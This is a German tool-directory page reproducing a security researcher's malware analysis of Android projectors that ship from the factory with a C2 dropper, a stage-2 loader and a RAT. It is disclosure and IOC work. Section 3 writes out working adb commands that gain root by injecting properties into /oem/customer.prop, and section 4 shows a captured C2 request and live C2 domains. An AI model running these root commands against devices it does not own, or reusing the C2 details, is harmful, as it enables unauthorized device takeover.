Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Android-Projector-C2-Malware — Zerlegung eines c2-Netzwerks chinesischer beamers - SilentSDK-Analysis | Kitploit
Tools/GitHubGitHub/kavan00/android-projector-c2-malware
Android-SicherheitEmbedded-System-SicherheitManagement von Indicators of Compromise (IOC)IoT-SicherheitNetzwerkforensikReverse EngineeringMalware-AnalyseDigitale ForensikCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Bedrohungsanalyse
Lieferkettensicherheit
Firmware-Analyse
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

Zerlegung eines c2-Netzwerks chinesischer beamers - SilentSDK-Analysis

Repository anzeigen
18266vor 5 MonatenNoch nicht geprüft

Pre-installed C2-Infrastruktur und RAT-Payload auf Android-Projektoren

Technischer Analysebericht — Sicherheitsforschung


Betroffene Geräte: Mehrere Android-Projektoren von Beamermarken wie der Nonete (z. B. Modell HY260Pro) (wahrscheinlich auch mehrere Projektoren von Magcubic, Hotack, Huyukang und vielen weiteren, da diese Unternehmen ähnliche Modelle vertreiben und es Hinweise gibt, die dies stützen)
Chipset-Plattform: Allwinner H713 / sun50iw12p1 — betrifft möglicherweise alle Geräte auf dieser Plattform
Analysezeitraum: 11.–17. April 2026
Klassifizierung: Vorinstallierte Command-and-Control-Infrastruktur mit Remote-Access-Trojaner-Payload


TL;DR

  • Das Problem: Zahlreiche günstige Android-Projektoren (möglicherweise Marken wie Magcubic, Hotack usw., die den Allwinner H713-Chip verwenden), die derzeit in großen Mengen auf Amazon, eBay und AliExpress verkauft werden, sind ab Werk mit Malware infiziert (Supply-Chain-Angriff, ähnlich den „BADBOX"-Fällen).
  • Der Mechanismus: Eine harmlos erscheinende System-App („StoreOS") fungiert als getarnter Dropper. Sie lädt im Hintergrund völlig geräuschlos einen Stage-2-Dropper namens „SilentSDK" herunter und installiert ihn mit maximalen Systemrechten, der wiederum ein modulares, pluginbasiertes, architekturbewusstes RAT & möglicherweise Phishing-Framework installiert.
  • Die Gefahr: Die Malware stellt eine C2-Verbindung nach China (api.pixelpioneerss.com) her, extrahiert sensible Geräte-IDs und kann jederzeit beliebigen zusätzlichen Schadcode mit Root-Rechten herunterladen und ausführen (chmod 777). Zudem weisen die Geräte offene Root-Backdoors auf.
  • Sofortmaßnahme: Die C2-Domains (insbesondere *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) müssen auf Netzwerkebene blockiert werden. Betroffene Benutzer können die bösartigen Apps nur manuell über ADB deaktivieren, da sie tief im System verankert sind.

Dringlichkeitshinweis

Die in diesem Bericht dokumentierte Malware-Infrastruktur ist auf Android-Projektoren vorinstalliert, die derzeit in großen Mengen an Endverbraucher auf Amazon, eBay und AliExpress verkauft werden. Die betroffenen Geräte umfassen möglicherweise mehrere Markennamen (Hotack, Huyukang, Magcubic, Nonete, u. a.). Identische C2-Infrastruktur wurde unabhängig auf anderen Geräten desselben Herstellers bestätigt (siehe Abschnitt 13). Das Muster entspricht den BADBOX-Fällen.


Inhaltsverzeichnis

  1. Geräteidentifikation
  2. Untersuchungsablauf
  3. Root-Zugriff — Exploit-Pfad
  4. C2-Server-Antwort — Kernbeweise
  5. Malware-Ökosystem-Überblick
  6. StoreOS — Dropper-Analyse (com.htc.storeos)
  7. EventUploadService — Telemetrie (com.htc.eventuploadservice)
  8. ExpandSDK — Ad-Einblendung (com.htc.expandsdk)
  9. SilentSDK — Stage-2-Dropper-Analyse (com.hotack.silentsdk)
  10. Die Malware
  11. System-Backdoors
  12. Netzwerk-Forensik
  13. Gerätespoofing (Build-Fingerprint-Spoofing)
  14. Externe Bestätigung
  15. Indicators of Compromise (IOCs)
  16. MITRE ATT&CK Mapping
  17. Sofortmaßnahmen
  18. Quellen

Gekauftes Gerät: Amazon-Link – Nonete Mini Beamer 4K 1080P


1. Geräteidentifikation

EigenschaftWert
MarkennameNonete HY260Pro (von mehreren Unternehmen verkauftes Modell)
Interner ModellnameNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
BetriebssystemSpectraOS (Android 11, Kernel 5.4.99)
Tatsächlicher Build-FingerprintAllwinner/h713_tuna_p3/h713-tuna_p3:11
Gefälschter Build-FingerprintADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (keine Durchsetzung)
Plattform-Signing-KeyÖffentlicher AOSP-Testschlüssel
OEM-ZertifikatCN=蓝鲨, OU=www.bsh.me, C=CN
Firmware-KanalHY260Pro_SpectraOS_TPYB

Hinweis zum Umfang: Der Allwinner H713-Chipsatz ist in zahlreichen günstigen Android-Projektoren verbaut, die unter wechselnden Markennamen auf dem europäischen Markt verkauft werden. Die identische Firmware-Basis (h713_tuna_p3) und der identische C2-Betreiber (Shenzhen Aodin Technology) legen nahe, dass alle Geräte dieses OEMs dieselbe Infrastruktur enthalten.


2. Untersuchungsablauf

SchrittAktionErgebnis
1Wireshark-Mitschnitt des NetzwerkverkehrsHTTP-Traffic zu store-api.aodintech.com
2Dekodierung der gzip-komprimierten C2-Antwort7 Apps, darunter versteckte „SilentTools"
3AES-CBC-Entschlüsselung des Download-PfadsSchlüssel [GESCHWÄRZT], URL zu .bpp-Datei
4Root-Exploit über /oem/customer.propuid=0(root) nach Property-Injection
5Forensischer Dump von /data, /oem, /systemAPKs, Datenbanken, Konfigurationen
6Statische Analyse von StoreOS DEXpm install -r -d, Byte-Reversal-Schutz
7Reverse Engineering des reverseLen-MechanismusVerständnis des Anti-Analyse-Schutzes
8Brechen des Byte-Reversal-SchutzesEntschlüsseltes, analysierbares SilentSDK DEX
9XOR-Entschlüsselung von SilentSDK-StringsC2-Domain api.pixelpioneerss.com bestätigt
10Hash-Überprüfung über drei QuellenMD5/SHA-256 stimmen exakt überein
11Reverse Engineering des Malware-Download-ProzessesServer sind noch online
12Reverse Engineering der MalwarePlugin-basiertes Rat-Framework

3. Root-Zugriff — Exploit-Pfad

Root-Zugriff wurde durch eine Kombination von drei Schwachstellen erzielt:

  1. SELinux Permissive — Zugriffsverletzungen werden nur protokolliert, nicht blockiert.
  2. Weltbeschreibbares /oem — Die Partition ist als FAT mit fmask=0000 eingehängt.
  3. customer.prop wird beim Booten geladen — Überschreibt System-Properties.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**Auswirkungen:** Jeder Benutzer mit physischem Zugriff oder ein Angreifer im selben Netzwerk (über ADB, Port 5555 offen, keine Authentifizierung) erhält vollständigen Root-Zugriff.

---

## 4. C2-Server-Antwort — Kernbeweise

### Erfasste HTTP-Anfrage```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

Server-Antwort (aus pcapng dekodiert - Tabelle)

Die gzip-komprimierte Antwort enthält eine JSON-Liste mit sieben Apps. Sechs davon sind reguläre Streaming-Apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). Die siebte ist SilentTools:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
Tool herunterladen